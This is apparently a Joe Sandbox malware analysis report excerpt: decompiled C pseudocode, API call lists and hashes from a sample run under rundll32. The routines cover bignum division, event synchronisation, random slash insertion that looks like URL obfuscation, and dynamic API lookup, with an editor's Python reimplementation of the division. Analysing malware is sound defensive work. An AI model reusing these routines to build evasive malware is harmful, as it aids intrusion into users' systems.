                					_t66 = E04B9468A(_t101, 0x4b9a1d0);
                					_t103 = _t101 - _t79;
                					_a8 = _t103;
                					if(_t103 < 0) {
                						L17:
                						E04B9468A(_a16, _a4);
                						E04B97898(_t79,  &_v428, _a4, _t97);
                						memset( &_v428, 0, 0x10c);
                						_t55 = memset( &_v156, 0, 0x84);
                						goto L18;
                					}
                					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                					do {
                						if(_v8 != 0xffffffff) {
                							_push(1);
                							_push(0);
                							_push(0);
                							_push( *_t99);
                							L04B9837A(); // _allmul: u[j+n] * 2^32 (64-bit product)
                							_t74 = _t66 +  *(_t99 - 4);
                							asm("adc edx, esi");
                							_push(0);
                							_push(_v8 + 1);
                							_push(_t92);
                							_push(_t74);
                							L04B98374(); // _aulldiv: (u[j+n]*2^32 + u[j+n-1]) / (v[n-1] + 1)
                							if(_t92 > 0 || _t74 > 0xffffffff) {
                								_t74 = _t74 | 0xffffffff;
                								_v16 = _v16 & 0x00000000;
                							}
                						} else {
                							_t74 =  *_t99;
                						}
                						_t106 = _t107 + _a8 * 4 - 0x1a8;
                						_a12 = _t74;
                						_t76 = E04B97A44(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                						while(1) {
                							 *_t99 =  *_t99 - _t76;
                							if( *_t99 != 0) {
                								goto L14;
                							}
                							L13:
                							_t92 =  &_v156;
                							if(E04B92D79(_t79, _t92, _t106) < 0) {
                								break;
                							}
                							L14:
                							_a12 = _a12 + 1;
                							_t76 = E04B96A0A(_t79,  &_v156, _t106, _t106);
                							 *_t99 =  *_t99 - _t76;
                							if( *_t99 != 0) {
                								goto L14;
                							}
                							goto L13;
                						}
                						_a8 = _a8 - 1;
                						_t66 = _a12;
                						_t99 = _t99 - 4;
                						 *(0x4b9a1d0 + _a8 * 4) = _t66;
                					} while (_a8 >= 0);
                					_t97 = _v12;
                					goto L17;
                				}
                				while(_t81 < _t96) {
                					_t81 = _t81 + 1;
                					_t56 = _t56 >> 1;
                					if(_t56 != 0) {
                						continue;
                					}
                					goto L4;
                				}
                				goto L4;
                			}
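The same long-division scheme in plain Python, as an added worked example (the editor's code, not code from the sample or from the Joe Sandbox report): 32-bit little-endian limbs, the normalising shift, the (v_top + 1) under-estimate built from 64-bit arithmetic the way the _allmul/_aulldiv pair does it, the multiply-subtract, and the raise-until-below-divisor fix-up. It assumes the roles read off the decompilation for E04B9180C (significant limb count), E04B927F8 (shift), E04B97A44 (multiply-subtract returning a borrow), E04B96A0A (subtract returning a borrow) and E04B92D79 (compare); the helper names and the test vectors are the editor's, and every result is checked against Python's own divmod.

```python
"""Schoolbook multi-limb division in the shape of E04B9755C (added example, editor's code)."""

LIMB_BITS = 32
BASE = 1 << LIMB_BITS
MASK = BASE - 1


def to_limbs(n, count=None):
    """Split a non-negative int into little-endian 32-bit limbs, zero-padded to `count`."""
    if count is None:
        count = max(1, (n.bit_length() + LIMB_BITS - 1) // LIMB_BITS)
    limbs = []
    for _ in range(count):
        limbs.append(n & MASK)
        n >>= LIMB_BITS
    return limbs


def from_limbs(limbs):
    n = 0
    for limb in reversed(limbs):
        n = (n << LIMB_BITS) | limb
    return n


def limb_count(limbs):
    """Significant limb count: the role assumed for E04B9180C."""
    n = len(limbs)
    while n and limbs[n - 1] == 0:
        n -= 1
    return n


def shift_left(limbs, shift):
    """Shift a limb array left by 0..31 bits; returns (limbs, carry out of the top limb)."""
    out, carry = [], 0
    for limb in limbs:
        value = (limb << shift) | carry
        out.append(value & MASK)
        carry = value >> LIMB_BITS
    return out, carry


def mul_sub(u, j, v, q):
    """u[j:j+len(v)] -= q * v in place; returns the borrow out of the top limb (E04B97A44's role)."""
    borrow = 0
    for i, vi in enumerate(v):
        t = u[j + i] - q * vi - borrow
        u[j + i] = t & MASK
        borrow = -(t >> LIMB_BITS)  # floor shift of a negative t is minus the borrow count
    return borrow


def sub_in_place(u, j, v):
    """u[j:j+len(v)] -= v in place; returns the borrow (E04B96A0A's role)."""
    return mul_sub(u, j, v, 1)


def compare(u, j, v):
    """Compare u[j:j+len(v)] with v, most significant limb first (E04B92D79's role)."""
    for i in range(len(v) - 1, -1, -1):
        if u[j + i] != v[i]:
            return -1 if u[j + i] < v[i] else 1
    return 0


def divmod_limbs(dividend, divisor):
    """Return (quotient, remainder) as ints for two little-endian limb arrays."""
    n = limb_count(divisor)
    if n == 0:
        raise ZeroDivisionError("divisor has no significant limbs")  # the sample returns 0 here
    m = limb_count(dividend)
    if m < n:
        return 0, from_limbs(dividend)
    # Normalise: shift = 32 - bit length of the top divisor limb (the `_t56 >>= 1` loop).
    top, bits = divisor[n - 1], 0
    while bits < LIMB_BITS and top:
        bits += 1
        top >>= 1
    shift = LIMB_BITS - bits
    v, _ = shift_left(divisor[:n], shift)
    u, carry = shift_left(dividend[:m], shift)
    u.append(carry)  # the extra top limb the sample stores at _v428[_t101]
    v_top = v[n - 1]
    q = [0] * (m - n + 1)
    for j in range(m - n, -1, -1):
        # Digit estimate from the top two limbs divided by (v_top + 1): never too large.
        if v_top == MASK:
            qhat = u[j + n]
        else:
            qhat = min(((u[j + n] << LIMB_BITS) | u[j + n - 1]) // (v_top + 1), MASK)
        u[j + n] -= mul_sub(u, j, v, qhat)
        # Fix-up: subtract the divisor again while the partial remainder is still >= it.
        while u[j + n] != 0 or compare(u, j, v) >= 0:
            qhat += 1
            u[j + n] -= sub_in_place(u, j, v)
        q[j] = qhat
    # Undo the normalising shift on the remainder (E04B97898's role).
    return from_limbs(q), from_limbs(u[:n]) >> shift


# Constructed test vectors (editor's): mixed limb counts, a divisor whose top limb is
# 0xffffffff, a dividend shorter than the divisor, and values that need the fix-up loop.
CASES = [
    (100, 7),
    (10**40, 12345678901234567890),
    ((MASK << 32) | 12345, (MASK << 32) | 7),
    (2**96 - 1, (MASK << 32) | 7),
    (2**64 - 1, 2**96 + 5),
    (2**200 + 12345, 3 * 2**70 + 99),
    (0xDEADBEEFCAFEBABE0123456789ABCDEF, 0xFFFFFFFF00000001),
]


def check_against_python():
    """True when every case agrees with divmod(); the block's self-check."""
    return all(divmod_limbs(to_limbs(a), to_limbs(b)) == divmod(a, b) for a, b in CASES)
```

Because the divisor's top limb is at least 2^31 after normalisation, an estimate taken against (v_top + 1) undershoots the true digit by at most two or three, which is why the sample can afford a plain subtract-and-compare fix-up loop instead of the two-limb correction in Knuth's Algorithm D.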
                Instruction addresses for E04B9755C: 0x04b9755f - 0x04b976f0

                APIs
                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04B9760F
                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04B97625
                • memset.NTDLL ref: 04B976CE
                • memset.NTDLL ref: 04B976E4
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: memset$_allmul_aulldiv
                • String ID:
                • API String ID: 3041852380-0
                • Opcode ID: 756353b9d93c461e06545a5e2c0f25b87744cf5cf1461839df97741a6d830253
                • Instruction ID: ee4ab0f0d55cf553f7865df4c2442442d85bd5902ef3cd4e68393be48a400512
                • Opcode Fuzzy Hash: 756353b9d93c461e06545a5e2c0f25b87744cf5cf1461839df97741a6d830253
                • Instruction Fuzzy Hash: 87417F72A10219EBEF10AF68CC40BEE77E9EF45314F1045B9B819A7290DA70BE55CB91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E04B92634(signed int _a4, signed int* _a8) {
                				void* __ecx;
                				void* __edi;
                				signed int _t6;
                				intOrPtr _t8;
                				intOrPtr _t12;
                				short* _t19;
                				void* _t25;
                				signed int* _t28;
                				CHAR* _t30;
                				long _t31;
                				intOrPtr* _t32;
                
                				_t6 =  *0x4b9a310; // 0xd448b889
                				_t32 = _a4;
                				_a4 = _t6 ^ 0x109a6410;
                				_t8 =  *0x4b9a348; // 0x56d5a8
                				_t3 = _t8 + 0x4b9b87a; // 0x61636f4c
                				_t25 = 0;
                				_t30 = E04B9686C(_t3, 1);
                				if(_t30 != 0) {
                					_t25 = CreateEventA(0x4b9a34c, 1, 0, _t30);
                					E04B94130(_t30);
                				}
                				_t12 =  *0x4b9a2fc; // 0x4000000a
                				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04B928F6() != 0) {
                					L12:
                					_t28 = _a8;
                					if(_t28 != 0) {
                						 *_t28 =  *_t28 | 0x00000001;
                					}
                					_t31 = E04B9708B(_t32, 0);
                					if(_t31 == 0 && _t25 != 0) {
                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                					}
                					if(_t28 != 0 && _t31 != 0) {
                						 *_t28 =  *_t28 & 0xfffffffe;
                					}
                					goto L20;
                				} else {
                					_t19 =  *0x4b9a124( *_t32, 0x20);
                					if(_t19 != 0) {
                						 *_t19 = 0;
                						_t19 = _t19 + 2;
                					}
                					_t31 = E04B958B9(0,  *_t32, _t19, 0);
                					if(_t31 == 0) {
                						if(_t25 == 0) {
                							L22:
                							return _t31;
                						}
                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                						if(_t31 == 0) {
                							L20:
                							if(_t25 != 0) {
                								CloseHandle(_t25);
                							}
                							goto L22;
                						}
                					}
                					goto L12;
                				}
                			}

                APIs
                  • Part of subcall function 04B9686C: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05109D00,00000000,?,?,69B25F44,00000005,04B9A00C,4D283A53,?,?), ref: 04B968A2
                  • Part of subcall function 04B9686C: lstrcpy.KERNEL32(00000000,00000000), ref: 04B968C6
                  • Part of subcall function 04B9686C: lstrcat.KERNEL32(00000000,00000000), ref: 04B968CE
                • CreateEventA.KERNEL32(04B9A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04B9177C,?,?,?), ref: 04B92675
                  • Part of subcall function 04B94130: RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                • WaitForSingleObject.KERNEL32(00000000,00004E20,04B9177C,00000000,00000000,?,00000000,?,04B9177C,?,?,?), ref: 04B926D5
                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04B9177C,?,?,?), ref: 04B92703
                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04B9177C,?,?,?), ref: 04B9271B
                Similarity
                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                • String ID:
                • API String ID: 73268831-0
                • Opcode ID: 76cc27ab81ef93768d409e11728bfe49b88d14ef50f4ee1282cdae15a368bd62
                • Instruction ID: ae675c1168894a295687a045fcc6a3156d047b5871bd046490b3558f032f75f3
                • Opcode Fuzzy Hash: 76cc27ab81ef93768d409e11728bfe49b88d14ef50f4ee1282cdae15a368bd62
                • Instruction Fuzzy Hash: 8E21E432A00311BBDF255E789C84A6B77E9FF48714B150EFAFD51EB200DA39EC118654
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 39%
                			E04B916CD(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                				intOrPtr _v12;
                				void* _v16;
                				void* _v28;
                				char _v32;
                				void* __esi;
                				void* _t29;
                				void* _t38;
                				signed int* _t39;
                				void* _t40;
                
                				_t36 = __ecx;
                				_v32 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v12 = _a4;
                				_t38 = E04B947E2(__ecx,  &_v32);
                				if(_t38 != 0) {
                					L12:
                					_t39 = _a8;
                					L13:
                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                						_t23 =  &(_t39[1]);
                						if(_t39[1] != 0) {
                							E04B940CE(_t23);
                						}
                					}
                					return _t38;
                				}
                				if(E04B91000(0x40,  &_v16) != 0) {
                					_v16 = 0;
                				}
                				_t40 = CreateEventA(0x4b9a34c, 1, 0,  *0x4b9a3e4);
                				if(_t40 != 0) {
                					SetEvent(_t40);
                					Sleep(0xbb8);
                					CloseHandle(_t40);
                				}
                				_push( &_v32);
                				if(_a12 == 0) {
                					_t29 = E04B92517(_t36);
                				} else {
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_t29 = E04B94467(_t36);
                				}
                				_t41 = _v16;
                				_t38 = _t29;
                				if(_v16 != 0) {
                					E04B95D72(_t41);
                				}
                				if(_t38 != 0) {
                					goto L12;
                				} else {
                					_t39 = _a8;
                					_t38 = E04B92634( &_v32, _t39);
                					goto L13;
                				}
                			}

                APIs
                • CreateEventA.KERNEL32(04B9A34C,00000001,00000000,00000040,?,?,746AF710,00000000,746AF730), ref: 04B9171E
                • SetEvent.KERNEL32(00000000), ref: 04B9172B
                • Sleep.KERNEL32(00000BB8), ref: 04B91736
                • CloseHandle.KERNEL32(00000000), ref: 04B9173D
                  • Part of subcall function 04B92517: WaitForSingleObject.KERNEL32(00000000,?,?,?,04B9175D,?,04B9175D,?,?,?,?,?,04B9175D,?), ref: 04B925F1
                Similarity
                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                • String ID:
                • API String ID: 2559942907-0
                • Opcode ID: 64c2737e138d2a0b7aa2bc08b0bb5e21114b02f35decd281d9eaaffeb5fca655
                • Instruction ID: 4e8b4f91c012a8094261fbecac25bbc1273117e0dc9efaec0a114e904dfa7eb4
                • Opcode Fuzzy Hash: 64c2737e138d2a0b7aa2bc08b0bb5e21114b02f35decd281d9eaaffeb5fca655
                • Instruction Fuzzy Hash: 7C2144B6900117ABEF11AFF88484CEE77E9EB44254B0544B5EA11A7100DB38BD4597A1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E04B94942(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                				intOrPtr _v8;
                				void* _v12;
                				void* _v16;
                				intOrPtr _t26;
                				intOrPtr* _t28;
                				intOrPtr _t31;
                				intOrPtr* _t32;
                				void* _t39;
                				int _t46;
                				intOrPtr* _t47;
                				int _t48;
                
                				_t47 = __eax;
                				_push( &_v12);
                				_push(__eax);
                				_t39 = 0;
                				_t46 = 0;
                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                				_v8 = _t26;
                				if(_t26 < 0) {
                					L13:
                					return _v8;
                				}
                				if(_v12 == 0) {
                					Sleep(0xc8);
                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                				}
                				if(_v8 >= _t39) {
                					_t28 = _v12;
                					if(_t28 != 0) {
                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                						_v8 = _t31;
                						if(_t31 >= 0) {
                							_t46 = lstrlenW(_v16);
                							if(_t46 != 0) {
                								_t46 = _t46 + 1;
                								_t48 = _t46 + _t46;
                								_t39 = E04B96601(_t48);
                								if(_t39 == 0) {
                									_v8 = 0x8007000e;
                								} else {
                									memcpy(_t39, _v16, _t48);
                								}
                								__imp__#6(_v16);
                							}
                						}
                						_t32 = _v12;
                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                					}
                					 *_a4 = _t39;
                					 *_a8 = _t46 + _t46;
                				}
                				goto L13;
                			}

                APIs
                Similarity
                • API ID: FreeSleepStringlstrlenmemcpy
                • String ID:
                • API String ID: 1198164300-0
                • Opcode ID: 06e0fc4d5579fe51d1712acb5c1941147e9e6c0b47f2b939fa214e0c26e4892c
                • Instruction ID: bb573660fd9630a18303f751c37bf968c7456cea8d2438acf25032253f05e119
                • Opcode Fuzzy Hash: 06e0fc4d5579fe51d1712acb5c1941147e9e6c0b47f2b939fa214e0c26e4892c
                • Instruction Fuzzy Hash: 8221FA79905209EFDF11DFA8D98499EBBF8EF59304B1041B9E946A7210EB31EE41CB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E04B92273(unsigned int __eax, void* __ecx) {
                				void* _v8;
                				void* _v12;
                				signed int _t21;
                				signed short _t23;
                				char* _t27;
                				void* _t29;
                				void* _t30;
                				unsigned int _t33;
                				void* _t37;
                				unsigned int _t38;
                				void* _t41;
                				void* _t42;
                				int _t45;
                				void* _t46;
                
                				_t42 = __eax;
                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                				_t38 = __eax;
                				_t30 = RtlAllocateHeap( *0x4b9a2d8, 0, (__eax >> 3) + __eax + 1);
                				_v12 = _t30;
                				if(_t30 != 0) {
                					_v8 = _t42;
                					do {
                						_t33 = 0x18;
                						if(_t38 <= _t33) {
                							_t33 = _t38;
                						}
                						_t21 =  *0x4b9a2f0; // 0xd0d2e878
                						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                						 *0x4b9a2f0 = _t23;
                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                						memcpy(_t30, _v8, _t45);
                						_v8 = _v8 + _t45;
                						_t27 = _t30 + _t45;
                						_t38 = _t38 - _t45;
                						_t46 = _t46 + 0xc;
                						 *_t27 = 0x2f;
                						_t13 = _t27 + 1; // 0x1
                						_t30 = _t13;
                					} while (_t38 > 8);
                					memcpy(_t30, _v8, _t38 + 1);
                				}
                				return _v12;
                			}

                APIs
                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04B95E1D,00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B9227E
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04B92296
                • memcpy.NTDLL(00000000,05109600,-00000008,?,?,?,04B95E1D,00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B922DA
                • memcpy.NTDLL(00000001,05109600,00000001,04B96DDD,00000000,05109600), ref: 04B922FB
                Similarity
                • API ID: memcpy$AllocateHeaplstrlen
                • String ID:
                • API String ID: 1819133394-0
                • Opcode ID: f247ad16eccedfcc614d93699aa2b8efdc49fc7a7fa26ec394a7f07745ccd294
                • Instruction ID: ee354da526b7bb781351d89164967e1e0dd807d4fba13e253a39ecec5bc7336d
                • Opcode Fuzzy Hash: f247ad16eccedfcc614d93699aa2b8efdc49fc7a7fa26ec394a7f07745ccd294
                • Instruction Fuzzy Hash: CE1129B2A00214BFDF148F69DD84D9E7BEEDB85360B1501BAF404D7240EB759E0487B0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 64%
                			E04B958B9(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                				intOrPtr _v36;
                				intOrPtr _v44;
                				intOrPtr _v48;
                				intOrPtr _v52;
                				void _v60;
                				char _v64;
                				intOrPtr _t18;
                				intOrPtr _t19;
                				intOrPtr _t26;
                				intOrPtr _t27;
                				long _t28;
                
                				_t27 = __edi;
                				_t26 = _a8;
                				_t28 = E04B951D3(_a4, _t26, __edi);
                				if(_t28 != 0) {
                					memset( &_v60, 0, 0x38);
                					_t18 =  *0x4b9a348; // 0x56d5a8
                					_t28 = 0;
                					_v64 = 0x3c;
                					if(_a12 == 0) {
                						_t7 = _t18 + 0x4b9b4e0; // 0x70006f
                						_t19 = _t7;
                					} else {
                						_t6 = _t18 + 0x4b9b904; // 0x750072
                						_t19 = _t6;
                					}
                					_v52 = _t19;
                					_push(_t28);
                					_v48 = _a4;
                					_v44 = _t26;
                					_v36 = _t27;
                					E04B92496();
                					_push( &_v64);
                					if( *0x4b9a100() == 0) {
                						_t28 = GetLastError();
                					}
                					_push(1);
                					E04B92496();
                				}
                				return _t28;
                			}

                APIs
                  • Part of subcall function 04B951D3: SysAllocString.OLEAUT32(00000000), ref: 04B9522D
                  • Part of subcall function 04B951D3: SysAllocString.OLEAUT32(0070006F), ref: 04B95241
                  • Part of subcall function 04B951D3: SysAllocString.OLEAUT32(00000000), ref: 04B95253
                • memset.NTDLL ref: 04B958DC
                • GetLastError.KERNEL32 ref: 04B95928
                Strings
                Similarity
                • API ID: AllocString$ErrorLastmemset
                • String ID: <$@MetNet
                • API String ID: 3736384471-3263418992
                • Opcode ID: 7a92fcd133bdea4220a20265d0bb2df48b781d553f34514d363df7f0f5381a0c
                • Instruction ID: 62219536732402e868f33db6424f965a20108591f74c03456cb6c5564d860fd9
                • Opcode Fuzzy Hash: 7a92fcd133bdea4220a20265d0bb2df48b781d553f34514d363df7f0f5381a0c
                • Instruction Fuzzy Hash: 6E012171D00218BBDF11DFA8D885EDE7BF8FB09794F414566E904E7201E774AD048BA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E04B967A3(void* __esi) {
                				struct _SECURITY_ATTRIBUTES* _v4;
                				void* _t8;
                				void* _t10;
                
                				_v4 = 0;
                				memset(__esi, 0, 0x38);
                				_t8 = CreateEventA(0, 1, 0, 0);
                				 *(__esi + 0x1c) = _t8;
                				if(_t8 != 0) {
                					_t10 = CreateEventA(0, 1, 1, 0);
                					 *(__esi + 0x20) = _t10;
                					if(_t10 == 0) {
                						CloseHandle( *(__esi + 0x1c));
                					} else {
                						_v4 = 1;
                					}
                				}
                				return _v4;
                			}

                APIs
                • memset.NTDLL ref: 04B967B1
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,746981D0,00000000,00000000), ref: 04B967C6
                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B967D3
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,04B96E43,00000000,?), ref: 04B967E5
                Similarity
                • API ID: CreateEvent$CloseHandlememset
                • String ID:
                • API String ID: 2812548120-0
                • Opcode ID: a0ea52cb123bcdd32f255066ac688e033b0fc15dbc2899fdf6d7a996ef7c4ccf
                • Instruction ID: 45bb6216490cae5752b87c4fe967bf49ab4b4417b4c12e60d1e7083b396380af
                • Opcode Fuzzy Hash: a0ea52cb123bcdd32f255066ac688e033b0fc15dbc2899fdf6d7a996ef7c4ccf
                • Instruction Fuzzy Hash: 50F05EF1104308BFE7106F26DCC4C2BBFECEB41298B11497EF55682111DA75EC088A71
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E04B9395F() {
                				void* _t1;
                				intOrPtr _t5;
                				void* _t6;
                				void* _t7;
                				void* _t11;
                
                				_t1 =  *0x4b9a30c; // 0x2c0
                				if(_t1 == 0) {
                					L8:
                					return 0;
                				}
                				SetEvent(_t1);
                				_t11 = 0x7fffffff;
                				while(1) {
                					SleepEx(0x64, 1);
                					_t5 =  *0x4b9a35c; // 0x0
                					if(_t5 == 0) {
                						break;
                					}
                					_t11 = _t11 - 0x64;
                					if(_t11 > 0) {
                						continue;
                					}
                					break;
                				}
                				_t6 =  *0x4b9a30c; // 0x2c0
                				if(_t6 != 0) {
                					CloseHandle(_t6);
                				}
                				_t7 =  *0x4b9a2d8; // 0x4d10000
                				if(_t7 != 0) {
                					HeapDestroy(_t7);
                				}
                				goto L8;
                			}

                APIs
                • SetEvent.KERNEL32(000002C0,00000001,04B92F45), ref: 04B9396A
                • SleepEx.KERNEL32(00000064,00000001), ref: 04B93979
                • CloseHandle.KERNEL32(000002C0), ref: 04B9399A
                • HeapDestroy.KERNEL32(04D10000), ref: 04B939AA
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: CloseDestroyEventHandleHeapSleep
                • String ID:
                • API String ID: 4109453060-0
                • Opcode ID: 2c711623efab240ea51fea0023305e7122542f5f72562c84e208bea2ba0e7319
                • Instruction ID: 39c0df0ab4f4b0414a547ef4c1042f41c4bd000ab00e8084c9535067b09126ac
                • Opcode Fuzzy Hash: 2c711623efab240ea51fea0023305e7122542f5f72562c84e208bea2ba0e7319
                • Instruction Fuzzy Hash: 3AF039B1B00311ABEF205B36AA48B5637E8EB1D761B04126ABC16E7780DF28EC448670
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401DA8(void* __ecx, WCHAR** _a4) {
                				struct HINSTANCE__* _v8;
                				long _v12;
                				long _t10;
                				long _t19;
                				long _t20;
                				WCHAR* _t23;
                
                				_v8 =  *0x4041b0;
                				_t19 = 0x104;
                				_t23 = E00401634(0x208);
                				if(_t23 == 0) {
                					L8:
                					_t20 = 8;
                					L9:
                					return _t20;
                				} else {
                					goto L1;
                				}
                				while(1) {
                					L1:
                					_t10 = GetModuleFileNameW(_v8, _t23, _t19);
                					_v12 = _t10;
                					if(_t10 == 0 || _t19 != _t10) {
                						break;
                					}
                					_t19 = _t19 + 0x104;
                					E00401B8C(_t23);
                					_t23 = E00401634(_t19 + _t19);
                					if(_t23 != 0) {
                						continue;
                					}
                					break;
                				}
                				_t20 = 0;
                				if(_t23 == 0) {
                					goto L8;
                				}
                				if(_v12 == 0) {
                					_t20 = GetLastError();
                					E00401B8C(_t23);
                				} else {
                					 *_a4 = _t23;
                				}
                				goto L9;
                			}

                APIs
                  • Part of subcall function 00401634: RtlAllocateHeap.NTDLL(00000000,?,00401C48,00000030,746563F0,00000000), ref: 00401640
                • GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,?,00401D04,?), ref: 00401DD1
                • GetLastError.KERNEL32(?,?,?,00401D04,?), ref: 00401E0F
                  • Part of subcall function 00401B8C: RtlFreeHeap.NTDLL(00000000,00000030,004017C9,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401C96), ref: 00401B98
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: Heap$AllocateErrorFileFreeLastModuleName
                • String ID: @Met`fet MetTet
                • API String ID: 845456116-3757152079
                • Opcode ID: 039b0453bcb4b0e713a46865719909fde321064ec83d6e3893f24cb5eb5932f0
                • Instruction ID: 7fc625f481d614ce65e22506c8c43573341987d19a128e4d600b3ab6aedbb8a0
                • Opcode Fuzzy Hash: 039b0453bcb4b0e713a46865719909fde321064ec83d6e3893f24cb5eb5932f0
                • Instruction Fuzzy Hash: D701D872901616A7C7219769CC4499FBAAD9FC5750B150137FD00B72A0EA78DD4187F8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E04B955C3(void* __ecx) {
                				signed int _v8;
                				_Unknown_base(*)()* _t9;
                				signed int _t11;
                				intOrPtr _t12;
                				struct HINSTANCE__* _t14;
                				intOrPtr _t17;
                				intOrPtr _t20;
                
                				_t9 =  *0x4b9a340;
                				_v8 = _v8 & 0x00000000;
                				_t20 =  *0x4b9a2f4; // 0x2c4
                				if(_t9 != 0) {
                					L2:
                					if(_t20 != 0) {
                						_t11 =  *_t9(_t20,  &_v8);
                						if(_t11 == 0) {
                							_v8 = _v8 & _t11;
                						}
                					}
                					L5:
                					return _v8;
                				}
                				_t12 =  *0x4b9a348; // 0x56d5a8
                				_t3 = _t12 + 0x4b9b0af; // 0x4e52454b
                				_t14 = GetModuleHandleA(_t3);
                				_t17 =  *0x4b9a348; // 0x56d5a8
                				_t4 = _t17 + 0x4b9b9e0; // 0x6f577349
                				 *0x4b9a314 = _t14;
                				_t9 = GetProcAddress(_t14, _t4);
                				 *0x4b9a340 = _t9;
                				if(_t9 == 0) {
                					goto L5;
                				}
                				goto L2;
                			}

                APIs
                • GetModuleHandleA.KERNEL32(4E52454B,00000001,?,?,04B9692A,?,?), ref: 04B955E7
                • GetProcAddress.KERNEL32(00000000,6F577349), ref: 04B95600
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: Net
                • API String ID: 1646373207-515476347
